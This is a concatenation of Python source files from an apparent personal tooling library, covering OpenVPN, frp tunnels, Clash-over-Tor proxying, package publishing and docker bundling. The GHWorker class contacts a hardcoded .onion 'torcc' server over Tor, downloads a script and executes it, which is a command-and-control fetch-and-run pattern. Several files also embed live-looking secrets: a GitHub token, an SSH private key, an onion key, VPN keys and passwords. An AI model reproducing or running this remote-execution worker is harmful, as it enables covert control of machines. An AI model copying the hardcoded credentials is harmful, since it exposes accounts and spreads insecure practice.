# BAMCB4AwDQYJKoZIhvcNAQELBQADggEBAGwzTOEFOm7ETisycezWnPJXsbDtU9Ia
# /IwD3lNm+RXPoMDrwCqyNO1ySQmW8upuyYCaPMChTrEgWCJQdTwrBsO8hr2RUsYP
# HbKV7GmEweP6gq04HZLHnaLP/xf9GkIrCu4FjvMFq7kGJ1JUdlrUor3yTXqagU05
# 6m0f2W8dGmHQT2riH1JotY590z813E+tnSFqFj5telpMbsSetRR7B8KX3SASasKV
# RrqtfSY4ul0DVM5v6SFyst+UOxnBTK1FUqweOogZtt9r0b/rO8odO79I5KeKBOxi
# vIvsE6xZ/fPF5EJ9tR9ZKEU1iHiChMZ8kRNgZlVb4+zAxr+CMQUuSGE=
# -----END CERTIFICATE-----
# </cert>
# <ca>
# -----BEGIN CERTIFICATE-----
# MIIDSzCCAjOgAwIBAgIUeXx2K8uOJ/Dnc5xXY4w2z+Z4Pr0wDQYJKoZIhvcNAQEL
# BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwNTI3MDk1MDMzWhcNMzEw
# NTI1MDk1MDMzWjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
# AQEBBQADggEPADCCAQoCggEBAKwNo0TmEv9Zpc/1v2zHMwzqCd484tmxWPAij8oU
# lr0BovXOiQ6f2P5Qvq2oRby0msxmcNHBQBhMGbibyrISDPoY7WYdggNDB0P/aZks
# G+qXJwo7iDfAs094M3omO0Bz5dp5YFrIQoO2oaroxX+NFciy6J872muylmfwU8O+
# ajX/s2Ov3CMmkwMml6qB8pUwnvfadV+cX1rFE1cxZfU3x73ySnPOlFYVJ5nch2Ac
# UzTNCz0Pt7OneQ06kmyWFIUS92a/+eAWO/VcRp9cOig4JYhat6EfwdA/aCjTLpDO
# X6ZYtP6JwPb5rO0+BeEXz70IZAjDuNnNw/MuSV78NwyheksCAwEAAaOBkDCBjTAd
# BgNVHQ4EFgQUiyDvHnmqCFSDiba2OLD7PngWoWIwUQYDVR0jBEowSIAUiyDvHnmq
# CFSDiba2OLD7PngWoWKhGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghR5fHYr
# y44n8OdznFdjjDbP5ng+vTAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
# hkiG9w0BAQsFAAOCAQEABABlAKPETJ3+ivNzaqSz/QuElm4YfBPaukADckGh2ES5
# /T/SXNvSe4+hmTYq8WS0fDZE5n1sWTUR/Qb+KlTAWkTc8+HWHJaN3S0MWG0wtbsQ
# jH8FQKbb4pO40eVOdtZV0TjHbo/tDy4tkYBl8WFRAFomktAQaI8RjsgIe1dYyDon
# GsIffaOx1nnGw74AsDD8NTLaRAVLVX2qGLslSM7amc/XhLQKGuMwm4/pV4k47zyX
# wIQPx3BHoOgDTXtjvo3u4zTerzOS0Vq0CFeP024bK9G0IKlG6AQOzg30wRfeeB9Z
# jCGtJ4vzS2EkEN5CtvqYD0bPWp1i6hX61ZRQKyp9Xw==
# -----END CERTIFICATE-----
# </ca>
# key-direction 1
# <tls-auth>
# #
# # 2048 bit OpenVPN static key
# #
# -----BEGIN OpenVPN Static key V1-----
# ce5697cb2037f7977386df5744226ee3
# 8a69f892d69af37b210cb6e7e6f51d15
# b74003290477dac0ccc9d3434567e205
# 8386436418be5bde673c01dc53203211
# ed4a66835e393fd2f5f5dbafff9a08df
# 45744c9cc4088a957de3f67a7aad4b6e
# d92ee87413ea24e126b98dafc6a351aa
# 61fc86c0d1cb10b2a0bde19dfb7747bc
# 93bf68a045f10050495edd99652d4a3c
# e76593ab4c0f960a2fd2dbb199bfee87
# 20dc8e68a9f00c0b5fbf2538f703cc71
# b04a759d55795c692e04a2bd0f070bd4
# 963b5b8ecfadf2e65df18b430fa0778e
# 9e1d955e99a14b1ec63c003db9bbcd8b
# 74564c86d6e90d91bf94e730bcdf32d5
# bf61149dd85d40221c191e5dd6c3dd5d
# -----END OpenVPN Static key V1-----
# </tls-auth>

# redirect-gateway def1

# """.format(
#     host=self.host,
#     port=self.port,
#     proto=self.proto,
#     key=self.key
#     ).encode())

    async def handle_output(self):
        try:
            while True:
                if self.process.stdout:
                    line = self.process.stdout.readline().decode().strip()
                    logger.debug("vpnclient->{}".format(line))
                    if line.strip().find(
                            'Initialization Sequence Completed') > 0:
                        return "ok"
                    # TODO: 捕获失败的字符串，返回
                    # 要不然，进程启动失败会卡住,协程一直不退出

                if self.process.stderr:
                    line = self.process.stderr.readline().decode()
                    logger.info("vpn->[error]{}".format(line))
                if self.process.poll() is not None:
                    break
        except Exception as e:
            logger.error(traceback.format_exc(e))

    async def start(self):
        """启动openvpn进程"""
        self.write_openvpnconfig()
        # 必要的初始化
        bash_init = """
mkdir -p /dev/net
if [ ! -c /dev/net/tun ]; then
    mknod /dev/net/tun c 10 200
fi
"""
        process_helper.bash(bash_init)
        cmd = "openvpn --config {config}".format(
            # host=self.host,
            # port =self.port,
            # proto=self.proto,
            config=self.openvpn_config_path)
        logger.debug("执行命令：{}".format(cmd))
        self.process = subprocess.Popen(shlex.split(cmd),
                                        stdout=subprocess.PIPE)
        await self.handle_output()



import logging
import shlex
import subprocess
import tempfile
import traceback

from mtlibs import mtutils, process_helper
from mtlibs.mtutils import ranstr

logger = logging.getLogger(__name__)


class FrpcProc():
    """启动frpc隧道客户端"""

    def __init__(self, server_host, server_port, local_port):
        self.tmpdirname = tempfile.gettempdir() + "/frpcconfig_" + ranstr(20)
        self.server_host = server_host
        self.server_port = server_port
        self.local_port = local_port

    @classmethod
    def installIfNeed(cls):
        """安装"""
        if not process_helper.is_tool("frpc"):
            process_helper.bash("""
        wget -q -O frp_0.36.2_linux_386.tar.gz https://github.com/fatedier/frp/releases/download/v0.36.2/frp_0.36.2_linux_386.tar.gz && \
        tar vxzf frp_0.36.2_linux_386.tar.gz && rm frp_0.36.2_linux_386.tar.gz && \
        sudo cp frp_0.36.2_linux_386/frpc /usr/local/bin && sudo chmod +x /usr/local/bin/frpc && \
        sudo cp frp_0.36.2_linux_386/frps /usr/local/bin && sudo chmod +x /usr/local/bin/frps && \
        rm -rdf frp_0.36.2_linux_386
    """)

    def write_config(self):
        self.config_file = self.tmpdirname + "/frpc.ini"
        mtutils.writefile(
            self.config_file, """
[common]
protocol = tcp
server_addr = {server_host}
server_port = {server_port}

user = u3e108yisagtkocq
token = SakuraFrpClientToken
sakura_mode = true
use_recover = true

tcp_mux = true
pool_count = 1

[C74LB9FQ]
type = tcp
local_ip = 127.0.0.1
local_port = {local_port}
remote_port = 28176
use_encryption = false
use_compression = false""".format(server_host=self.server_host,
                                  server_port=self.server_port,
                                  local_port=self.local_port).encode())

    async def handle_output(self):
        try:
            while True:
                if self.process.stdout:
                    line = self.process.stdout.readline().decode().strip()
                    logger.debug("frpc->{}".format(line))
                if self.process.stderr:
                    line = self.process.stderr.readline().decode()
                    logger.info("frpc->[error]{}".format(line))
                if self.process.poll() is not None:
                    break
        except Exception as e:
            logger.error(traceback.format_exc(e))

    async def start(self):
        """启动openvpn进程"""
        # self.installIfNeed()
        FrpcProc.installIfNeed()
        self.write_config()
        cmd = "frpc --config " + self.config_file
        self.process = subprocess.Popen(shlex.split(cmd),
                                        stdout=subprocess.PIPE)
        await self.handle_output()



import random
import shlex
import subprocess
import tempfile
import time
from pathlib import Path

import requests

from mtlibs.tor_helper import TorProc

CCURL_BASE = "http://g5q7lyibqywjbljjxgvo67ioec2fsueydfrulaml7au334ptersj2vid.onion"


class GHWorker():

    def up(self):
        """连接中心服务器"""

        def onTor(tor):
            self.tor_socks5_port = tor.getSocksPort()
            url = CCURL_BASE + "/torcc/script"
            proxies = {
                "http":
                "socks5h://{}:{}".format("127.0.0.1", self.tor_socks5_port),
                "https":
                "socks5h://{}:{}".format("127.0.0.1", self.tor_socks5_port),
            }
            res = requests.get(url, proxies=proxies)
            tmppath = tempfile.gettempdir() + "/" + str(
                random.randint(0, 9999999))
            Path(tmppath).touch(mode=0o700)
            with open(tmppath, 'wb') as f:
                f.write(res.content)
            subprocess.run(tmppath)

        TorProc().start(connected_cb=onTor)
        while True:
            time.sleep(1)

    def send(self, data):
        """发送请求"""
        proxies = {
            "http": "socks5h://{}:{}".format("127.0.0.1",
                                             self.tor_socks5_port),
            "https": "socks5h://{}:{}".format("127.0.0.1",
                                              self.tor_socks5_port),
        }
        res = requests.post(CCURL_BASE + "/torcc/api/work", proxies=proxies)
        print(res.content)

    def heartbeat():
        """发送心跳包"""
        # data = {"data": {"host": "testtest.onion"}}
        pass


class GHWorkerClient():

    def __init__(self, ccurl):
        self.ccurl = ccurl

    def login():
        """登陆: 或者叫上线,就是请求ccurl,告诉他自己的域名"""


if __name__ == "__main__":
    GHWorker().up()



import os

APP_ROOT = os.path.join(os.path.dirname(__file__))

# 默认配置，可被环境变量覆盖。
config_data = {
    "APP_ROOT":
    APP_ROOT,
    "LOGS_ROOT":
    os.path.join(APP_ROOT, 'logs'),
    "DATA_ROOT":
    os.path.join(APP_ROOT, 'data'),
    "ROOT_PASSWORD":
    "www.gmail123456.com",
    "GHHOOK_TOKEN":
    'token1234567890',
    'GHTOKEN':
    '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',
    'ONIONKEY':
    'PT0gZWQyNTUxOXYxLXNlY3JldDogdHlwZTAgPT0AAABIhW8C1hUv92DkipPFSjAdxKU6oTHmYsRx7r0rZlGIYvwxQE5vwuDb2ZaGY9gZcuWTA6ZgInQvBxgZZPYKZyKr',
    'ID_ED25519':
    """-----BEGIN OPENSSH PRIVATE KEY-----
                b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
                QyNTUxOQAAACABjDQF9yT/3VpsrYW2AGd7Fn50+qUzBOnOvkkeWZuRMQAAAJDG1qKlxtai
                pQAAAAtzc2gtZWQyNTUxOQAAACABjDQF9yT/3VpsrYW2AGd7Fn50+qUzBOnOvkkeWZuRMQ
                AAAEB23P1AcFLmqQv3Bus0dIdlg0AG4WQKh3v0oxiRJpee7QGMNAX3JP/dWmythbYAZ3sW
                fnT6pTME6c6+SR5Zm5ExAAAACWthbGlAa2FsaQECAwQ=
                -----END OPENSSH PRIVATE KEY-----
""",
}

config_data.update(os.environ)


def get(name):
    return config_data.get(name)



#!/usr/bin/env python3

import os
import sys
import re
from version_parser import Version
from pathlib import Path
import shutil
from dotenv import load_dotenv, find_dotenv
import  argparse
import logging
from .. service.nginx import NginxService
from .. service.phpfpm import PhpFpmService

ENV_FILE = find_dotenv()
if ENV_FILE:
    load_dotenv(ENV_FILE)

load_dotenv(".env")

logging.basicConfig(level = logging.DEBUG,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

def main():
    """启动wordpress 开发环境"""
    cwd = os.getcwd()
    cwd_nginx_conf = os.path.join(os.getcwd(), "nginx.conf")
    if Path(cwd_nginx_conf).exists():
        logger.info(f"复制nginx.conf 文件到 /etc/nginx/nginx.conf")
        shutil.copy(cwd_nginx_conf, "/etc/nginx/nginx.conf")
    
    NginxService().start()
    # PhpFpmService.start()
    PhpFpmService().start()
    
    
    

if __name__ == "__main__":
    main()



#!/usr/bin/env python3

import os
import sys
import re
from version_parser import Version
from pathlib import Path
import shutil
from dotenv import load_dotenv, find_dotenv
import  argparse

ENV_FILE = find_dotenv()
if ENV_FILE:
    load_dotenv(ENV_FILE)

load_dotenv(".env")

import logging
logging.basicConfig(level = logging.DEBUG,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)



def credential():        
    pypirc = os.path.join(os.path.expanduser("~"),".pypirc")
    if Path(pypirc).exists():
        logger.info(f"file: {pypirc} exists,skip config pypirc")
    else:
        pypi_username = os.environ.get("PYPI_USERNAME")
        pypi_password = os.environ.get("PYPI_PASSWORD")
        
        logger.error(f"need PYPI_USERNAME and PYPI_PASSWORD env")
        content = f"""[pypi]
username:{pypi_username}
password:{pypi_password}"""
        # path = os.path.join(os.path.expanduser("~"),".pypirc")
        
        with open(pypirc,"w") as fd:
            fd.write(content)
                
# def version_patch(package_dir="."):        
#     init_py_path = os.path.join(os.getcwd(),package_dir,"__init__.py")
#     logger.info(f"init_py_path: {init_py_path}")
#     version = "0.0.1"
#     search=None
#     with open(init_py_path, 'r') as fd:
#         search = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
#                             fd.read(), re.MULTILINE)
        

#         if search:
#             version = search.group(1)
#             v1 = Version(version)
#             build_version = int(v1.get_build_version()) +1
#             newVersion = f"{v1.get_major_version()}.{v1.get_minor_version()}.{build_version}"
#             logger.info(f"new version: {newVersion}")
#             with open(init_py_path, 'w') as fd:
#                 fd.write(f"""__version__="{newVersion}" """)
#         else:
#             raise Exception(f"文件:{init_py_path},中没有版本相关字段")


def version_patch(package_dir="."):        
    init_py_path = os.path.join(os.getcwd(),package_dir,"version.txt")
    logger.info(f"init_py_path: {init_py_path}")
    
    version = '0.0.1'
    with open(init_py_path, "r") as fd:
        version = fd.read()
    v1 = Version(version)
    build_version = int(v1.get_build_version()) +1
    newVersion = f"{v1.get_major_version()}.{v1.get_minor_version()}.{build_version}"
    logger.info(f"新版本号：{newVersion}")
    with open(init_py_path, "w") as fd:
        fd.write(newVersion)


def clear_dist(package_dir="."):
    dist_dir = os.path.join(os.getcwd(),"dist")
    logger.info(f"dist_dir: {dist_dir}")
    if Path(dist_dir).exists():        
        shutil.rmtree(dist_dir)
        
def clear_build(package_dir="."):
    build_dir = os.path.join(os.getcwd(),"build")
    logger.info(f"build_dir: {build_dir}")
    if Path(build_dir).exists():        
        shutil.rmtree(build_dir)
        
def sub_publish_pypi(args):
    """
        用于二进制包发布到可自由下载的公网地址。
        目前仅支持python setuptools 的方式，
        打算后续支持npm , docker hub 等方式。
    """
    target_dir = getattr(args,"dir") if hasattr(args,"dir") else "."    
    logger.info(f"目标目录：{target_dir}")          

    credential()
    for sub_dir in target_dir:
        logger.info(f"开始处理{sub_dir}")
        version_patch(sub_dir)
        clear_dist(sub_dir)
        clear_build(sub_dir)
        os.system(f"""python3 {sub_dir}/setup.py bdist_wheel""")
        print("上传")
        os.system(f"""twine upload dist/*""")
    
    
app_name = "mtxcli"
def main():    
    parser = argparse.ArgumentParser(description="%s service" % app_name)
    # subparsers = parser.add_subparsers(help="%s service" % app_name)
    # sub agent
    # sub_agent = subparsers.add_parser('agent', help='mtxp agent')
    # sub_agent.set_defaults(func=sub_publish_pypi)
    # parser.add_argument('--dir')
    parser.add_argument('dir',default=".", nargs="*")       
    #设置默认函数
    parser.set_defaults(func=sub_publish_pypi)
    args = parser.parse_args()
    #执行函数功能
    args.func(args)
    
if __name__ == "__main__":
    main()


#!/usr/bin/env python3
import sys
import os
from mtlibs.docker_helper import isInContainer
from mtlibs import process_helper
from pathlib import Path
import logging
from dotenv import load_dotenv, find_dotenv
from mtlibs.github import gitup
import time
import argparse  

ENV_FILE = find_dotenv()
if ENV_FILE:
    load_dotenv(ENV_FILE)

logging.basicConfig(level = logging.DEBUG,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

def main():    
    parser = argparse.ArgumentParser()
    parser.add_argument("urls", default=None, nargs="*") 
    args = parser.parse_args()
    logger.info(f"urls: {args.urls}")
    
    
    urls = args.urls
    if not urls:
        # logger.info(f"没有输入urls参数，转为从环境变量中获取")
        # 从输入参数，或者环境变量中获取gitup网址。
        urls_from_env = os.environ.get("MTX_GITUP")
        if urls_from_env:
            urls = urls_from_env.split("|")
    
    if not urls:
        logger.info(f"need urls")
        time.sleep(3)
        exit()

    for item in urls:
        logfile = gitup(item)        
        # os.system(f"tail -f {logfile}")
    
    # while True:
    #     time.sleep(100)

if __name__ == "__main__":
    main()






import asyncio
from urllib.parse import urlparse
from mtlibs.mtutils import pipe

class SimpleHttpService:
    """端口转发服务"""
    async def handle_tcp_portforward(reader, writer, targetHost,targetPort):
        """tcp端口转发"""
        try:
            targetReader, targetWriter = await asyncio.open_connection(self.targetHost, self.targetPort)
            asyncio.create_task(pipe(reader, targetWriter))
            asyncio.create_task(pipe(targetReader, writer))
            addr1 = writer.get_extra_info('sockname')
            addr2 = writer.get_extra_info('peername')
            addr3 = targetWriter.get_extra_info('sockname')
            addr4 = targetWriter.get_extra_info('peername')
            print(f'''新的连接 {addr1!r} {addr2!r}-- {addr3!r} {addr4!r}''')
        except ConnectionRefusedError as e:
            # print("远程计算机拒绝网络连接")
            print(e)


    async def start(self,args):
        print(args)
        print('配置字符串',args.configurl)
        uri =  urlparse(args.configurl)
        self.localPort = uri.password
        self.localHost = uri.username
        self.remoteHost = uri.hostname,
        self.remotePort = uri.port or 80
        server = await asyncio.start_server(self.handle_tcp_portforward, self.localHost, self.localPort)
        addr = server.sockets[0].getsockname()
        print(f'tcp portforward Serving on {addr[0]}:{addr[1]}--->{self.remoteHost[0]}:{self.remotePort}')
        async with server:
            await server.serve_forever()







import threading
import asyncio
import types
import config
import time
from flask import Flask

from csservices import portforward
from csservices import flaskapp
from csservices import clash
from csservices import tor
from csservices import vpn

from csservices import flaskapp
async def on_command(args):
    """
        用独立的线程处理异步后台服务，
        因为放主线程会被其他应用干扰，例如flask app.run会阻塞事件循环。
    """
    # thread_event_loop = asyncio.new_event_loop() #若在新线程中，要创建线程专用的事件循环。
    # asyncio.set_event_loop(thread_event_loop)

    thread_event_loop = asyncio.get_event_loop()
    deamonTasks = [] #后台任务
    appconfig = config.getConfig()
    print('配置文件：',appconfig)

    if appconfig.get('services'):
        for k,v in appconfig["services"].items():
            print(f'服务 {k}')
            if 'portforward' == k : 
                task = thread_event_loop.create_task(portforward.PortService().start(v))            
                deamonTasks.append(task)
            elif 'http' ==k:
                # 这个特殊对待。使用线程。
                threading.Thread(target=flaskapp.FlaskService().start).start()
                # deamonTasks.append(thread_event_loop.create_task(flaskapp.FlaskService().start(v)))
            elif 'clash' == k:
                deamonTasks.append(thread_event_loop.create_task(clash.ClashService().start(v)))
            elif 'tor' ==k:
                deamonTasks.append(thread_event_loop.create_task(tor.TorService().start(v)))
            elif 'vpn' ==k:
                deamonTasks.append(thread_event_loop.create_task(vpn.VpnService().start(v)))
            else:
                raise Exception(f"未知的服务配置{k}")

    # 等待全部结束  
    print(f"后台服务数量：{len(deamonTasks)}")
    for coro in asyncio.as_completed(deamonTasks):
        try:
            earliest_result = await coro        
            print("一个任务完成",earliest_result,coro)
        except Exception as err:
            print("异步工作完成，但是有错误，",err)

        # print('earliest_result',earliest_result)
        # print('错误',earliest_result.exception())

    # thread_event_loop.run_forever()







import os
from stem.util import term


def start():
    """
        启动 clash 代理服务，
        注意，这个代理提供的以然是tor网络出口。
    """
    print(term.format("启动 clash 服务", term.Color.RED), flush=True)

    os.system('cp -r ~/.config/clash /tmp/clash')

    with open('/tmp/clash/config.yaml', 'w') as f:
        f.write("""
# HTTP(S) and SOCKS5 server on the same port
mixed-port: 42080
# Port of SOCKS5 proxy server on the local end
# socks-port: 47891
# Transparent proxy server port for Linux and macOS (Redirect TCP and TProxy UDP)
# redir-port: 47892
# Transparent proxy server port for Linux (TProxy TCP and TProxy UDP)
# tproxy-port: 47893
# Port of HTTP(S) proxy server on the local end
# port: 47894

bind-address: '0.0.0.0'
allow-lan: true
external-controller: 0.0.0.0:49090
secret: "feihuo321"
mode: rule
log-level: debug
ipv6: false
interface-name: eth0

authentication:
    - "mt:feihuo321"
proxies:
  # tor-socks5
  - name: "local9050"
    type: socks5
    server: 127.0.0.1
    port: 9050
proxy-groups:
  - name: tor_group
    type: select
    proxies:
      - local9050
rules:
  # - IP-CIDR,127.0.0.0/8,tor_group
  # - IP-CIDR,10.12.12.0/24,tor_group #内网网段
  # MATCH 为默认
  - MATCH,tor_group
  # - MATCH,DIRECT
""")

    os.system("clash -f /tmp/clash/config.yaml &")


if __name__ == '__main__':
    start()
    


#!/usr/bin/env python3
# 用于docker build 文件的加密打包，容器启动的解密解压
import sys
import os
from docker_helper import isInContainer
import process_helper
from pathlib import Path
import logging
from dotenv import load_dotenv, find_dotenv
from github import gitup
import time
import argparse
import docker_helper
import os
import subprocess
from subprocess import run

ENV_FILE = find_dotenv()
if ENV_FILE:
    load_dotenv(ENV_FILE)

logging.basicConfig(level = logging.DEBUG,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

#默认密码
DEFAULT_BUNDlER_PASS="secret----DEFAULT_BUNDlER_PASS------19199";

def build_bundle(password):
    logger.info(f"在容器中，TODO，解压并运行主程序")
    curr_dir = os.getcwd()
    logger.info(f"开始压缩文件: {curr_dir}")
    cmd = f"""tar -czf /app.tar.gz ."""
    subprocess.run(cmd, shell=True)
    logger.info("开始加密")

    # 试试一次性压缩加密
    subprocess.run(f"tar -czf - . | gpg -c --passphrase {password} > /package.tar.gz.gpg", shell=True)


def container_up(password):
    logger.info(f"容器启动, 解密密码: {container_up} TODO: 解压运行")



def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("password", default=None, nargs="*")
    args = parser.parse_args()

    password = os.environ.get("MTX_BUNDLER_PASS",DEFAULT_BUNDlER_PASS)
    logger.info(f"密码: {password}")


    is_mtx_build = os.environ.get("MTX_DOCKER_BUILD",False)
    is_docker = docker_helper.is_docker()
    if not is_mtx_build:
        container_up(password)
    else:
        #构建阶段
        build_bundle(password)

    print(run("env"))
if __name__ == "__main__":
    main()






from oauth2_provider.models import AccessToken, Application
from django.conf import settings

def create_app(app_name, secret="secret123!@###$@"):    
    app = Application.objects.filter(name=app_name)
    if not app:
        print(f"创建application {app_name}")
        newapp = Application(name=app_name, 
                                client_id=app_name,
                                redirect_uris="",
                                client_type="implicit",
                                client_secret=secret,
                                authorization_grant_type="openid-hybrid",
                                )
        newapp.save()
        
    else:
        print(f"oauth app {app_name}, 已存在，跳过创建")
        
def setup_default_app():
    defaultAppName = settings.MTXCMS_DEFAULT_OAUTH_APP_NAME
    try:
        create_app(defaultAppName)
        create_app('app2')

    except Exception as e:
        print(f"出错: {e}")